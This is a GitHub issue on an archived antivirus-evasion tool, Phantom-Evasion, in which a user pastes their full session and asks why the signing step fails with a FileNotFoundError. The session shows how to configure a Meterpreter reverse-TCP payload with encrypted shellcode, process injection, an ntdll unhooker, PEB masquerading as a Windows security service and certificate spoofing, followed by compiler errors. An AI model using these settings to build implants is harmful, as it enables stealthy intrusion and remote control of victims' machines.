This repository was archived by the owner on Nov 6, 2023. It is now read-only.
os.rename(Filename,Tmpfile) FileNotFoundError: [Errno 2] No such file or directory #82
Description
Hi Everyone,
It's my first time here and I think Phantom is great!!!
But when I go to the part 'myexe.exe' -> 'Ready2Sign.exe', it throws me the error. What should I do? Thanks.
Edit:
I've commented out the os.remove(Tmpfile) because I was thinking it removes the file before signing it but it's the same error.
By the way, I'm on Parrot. Thanks....
Here is the steps I did,
[+] MODULE DESCRIPTION:
Inject and execute shellcode
[>] Local process shellcode execution type:
> Thread
> APC
[>] Remote process shellcode execution type:
> ThreadExecutionHijack (TEH)
> Processinject (PI)
> APCSpray (APCS)
> EarlyBird (EB)
> EntryPointHijack (EPH)
[>] Local Memory allocation type:
> Virtual_RWX
> Virtual_RW/RX
> Virtual_RW/RWX
> Heap_RWX
[>] Remote Memory allocation type:
> Virtual_RWX
> Virtual_RW/RX
> Virtual_RW/RWX
> SharedSection
[>] Shellcode Encryption supported
[>] Shellcode can be embedded as resource
[>] AUTOCOMPILE format: exe,dll
Press Enter to continue:
[>] Insert Target architecture (default:x86):
[>] Insert shell generation method (default: msfvenom):
[>] Embed shellcode as PE resource? (Y/n): y
[>] Insert msfvenom payload (default: windows/meterpreter/reverse_tcp):
[>] Insert LHOST: 192.168.56.105
[>] Insert LPORT: 2357
[>] Custom msfvenom options(default: empty):
[>] Payload encryption
[1] none
[2] Xor
[3] Double-key Xor
[4] Vigenere
[5] Double-key Vigenere
[>] Select encoding option: 5
[>] Insert Exec-method (default:Thread):EPH
[>] Insert Memory allocation type (default:Virtual_RWX):Virtual_RW/RWX
[>] Insert target process filepath (default: svchost.exe):
[>] Insert Junkcode Intesity value (default:10):7
[>] Insert Junkcode Frequency value (default: 10):7
[>] Insert Junkcode Reinjection Frequency (default: 0):1
[>] Insert Evasioncode Frequency value (default: 10):7
[>] Dynamically load windows API? (Y/n):y
[>] Add Ntdll api Unhooker? (Y/n):y
[>] Masq peb process? (Y/n):y
[>] Insert fake process path?(default:C:\windows\system32\notepad.exe):C:\Windows\System32\SecurityHealthService.exe
[>] Insert fake process commandline?(default:empty):
[>] Strip executable? (Y/n):n
[>] Use certificate spoofer and sign executable? (Y/n):y
[>] Insert url target for certificate spoofer (default:www.windows.com:443):
[>] Insert certificate description (default:Notepad Benchmark Util):
[>] Insert output format (default:exe):
[>] Insert output filename:asdf
[>] Generating code...
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of c file: 1512 bytes
[>] Double-key Vigenere encryption...
[>] Compiling...
Source.c: In function ‘main’:
Source.c:5208:89: warning: unknown escape sequence: '\W'
5208 | QVINfEYoKeCBbErm->CommandLine.pBuffer = L"C:\Windows\System32\SecurityHealthService.exe";
| ^
Source.c:5208:89: warning: unknown escape sequence: '\S'
Source.c:5208:89: warning: unknown escape sequence: '\S'
Source.c:5209:91: warning: unknown escape sequence: '\W'
5209 | QVINfEYoKeCBbErm->ImagePathName.pBuffer = L"C:\Windows\System32\SecurityHealthService.exe";
| ^
Source.c:5209:91: warning: unknown escape sequence: '\S'
Source.c:5209:91: warning: unknown escape sequence: '\S'
Source.c:52453:11: warning: dereferencing ‘void *’ pointer
52453 | WopOwICDVp[onupsgykxdf] = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
| ^
Source.c:52453:56: warning: dereferencing ‘void *’ pointer
52453 | WopOwICDVp[onupsgykxdf] = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
| ^
Source.c:52453:56: error: void value not ignored as it ought to be
52453 | WopOwICDVp[onupsgykxdf] = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
| ~~~~~~~~~~^~~~~~~~~~~~~
Source.c:52453:26: error: invalid use of void expression
52453 | WopOwICDVp[onupsgykxdf] = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
| ^
Source.c:52456:11: warning: dereferencing ‘void *’ pointer
52456 | WopOwICDVp[onupsgykxdf] = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
| ^
Source.c:52456:56: warning: dereferencing ‘void *’ pointer
52456 | WopOwICDVp[onupsgykxdf] = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
| ^
Source.c:52456:56: error: void value not ignored as it ought to be
52456 | WopOwICDVp[onupsgykxdf] = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
| ~~~~~~~~~~^~~~~~~~~~~~~
Source.c:52456:26: error: invalid use of void expression
52456 | WopOwICDVp[onupsgykxdf] = (unsigned char)(((WopOwICDVp[onupsgykxdf] - eugtzkiw[okmqjgkohau]) + 256) % 256);
| ^
[>] Sign Executable
Traceback (most recent call last):
File "phantom-evasion.py", line 402, in <module>
CompleteMenu()
File "phantom-evasion.py", line 125, in CompleteMenu
Phantom_lib.ModuleLauncher(module_type)
File "Setup/Phantom_lib.py", line 964, in ModuleLauncher
ExeSigner(ModOpt["Outfile"],ModOpt["SpoofCert"],ModOpt["descr"])
File "Setup/Phantom_lib.py", line 455, in ExeSigner
os.rename(Filename,Tmpfile)
FileNotFoundError: [Errno 2] No such file or directory: 'asdf.exe' -> 'Ready2Sign.exe'
if I do this:
[>] Use certificate spoofer and sign executable? (Y/n):n
gives me file not found error also, no exe or bin generated...
I also tried to re-do the setup and I saw one package not installed, STRIP.
E: Unable to locate package strip